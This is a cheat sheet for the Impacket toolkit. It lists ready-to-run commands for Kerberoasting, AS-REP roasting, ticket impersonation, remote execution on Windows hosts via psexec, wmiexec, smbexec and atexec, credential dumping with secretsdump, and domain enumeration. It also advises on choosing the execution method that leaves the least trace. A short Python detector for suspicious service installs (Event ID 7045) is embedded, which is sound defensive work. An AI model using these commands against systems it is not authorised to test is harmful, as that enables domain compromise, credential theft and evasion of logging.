Impacket

Collection of Python scripts for interacting with Windows protocols: covers Kerberos, remote execution, credential dumping, and AD enumeration from Linux.

Kerberos

```bash
GetUserSPNs.py domain/user:pass -dc-ip <IP> -request
GetNPUsers.py domain/ -usersfile users.txt -dc-ip <IP>
getTGT.py domain/user:pass
getST.py domain/user:pass -spn cifs/target -impersonate admin
```

Remote Execution

Pick based on noise level: psexec is the loudest (it installs a service on the target), wmiexec is quieter, and atexec leaves the least trace.

```bash
psexec.py domain/user:pass@<IP>
wmiexec.py domain/user:pass@<IP>
smbexec.py domain/user:pass@<IP>
atexec.py domain/user:pass@<IP> "whoami"
```
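The "loudest" footprint above is the service install, which Windows records in the System log as Event ID 7045. The following is an added detection example, not Impacket's code: it runs over constructed 7045-shaped records and flags installs whose service name and image path fit an assumed heuristic (short letters-only name, binary dropped directly into the Windows directory); the allowlist and thresholds are assumptions to tune per environment.

```python
import re

# Constructed records in the shape of Windows System log Event ID 7045
# ("A service was installed in the system"); not real telemetry.
SAMPLE_EVENTS = [
    {"event_id": 7045, "service_name": "Sysmon64",
     "image_path": r"C:\Windows\Sysmon64.exe"},
    {"event_id": 7045, "service_name": "xKqT",
     "image_path": r"%systemroot%\bRtnWLpq.exe"},
    {"event_id": 7045, "service_name": "WinDefend",
     "image_path": r"C:\Program Files\Windows Defender\MsMpEng.exe"},
    {"event_id": 7040, "service_name": "xKqT", "image_path": ""},
]

# Assumed allowlist of services an admin expects to see installed.
KNOWN_SERVICES = {"sysmon64", "windefend"}

# Heuristic (an assumption, not documented tool behaviour): a new service
# with a short letters-only name whose binary sits directly in the Windows
# directory, rather than in System32 or Program Files, deserves a look.
RANDOM_NAME = re.compile(r"^[A-Za-z]{4,8}$")
WINDIR_ROOT_EXE = re.compile(
    r"^(%systemroot%|C:\\Windows)\\[^\\]+\.exe$", re.IGNORECASE)


def is_suspicious_service_install(event):
    """Return True for a 7045 record that matches the heuristic above."""
    if event.get("event_id") != 7045:
        return False
    name = event.get("service_name", "")
    if name.lower() in KNOWN_SERVICES:
        return False
    path = event.get("image_path", "")
    return bool(RANDOM_NAME.match(name)) and bool(WINDIR_ROOT_EXE.match(path))


def flag_service_installs(events):
    """Names of services whose install record looks like the footprint above."""
    return [e["service_name"] for e in events if is_suspicious_service_install(e)]


if __name__ == "__main__":
    for name in flag_service_installs(SAMPLE_EVENTS):
        print("review service install:", name)
```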

Credential Dumping

```bash
secretsdump.py domain/user:pass@<IP>
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
```

Enumeration

```bash
lookupsid.py domain/user:pass@<IP>
samrdump.py domain/user:pass@<IP>
rpcdump.py <IP>
```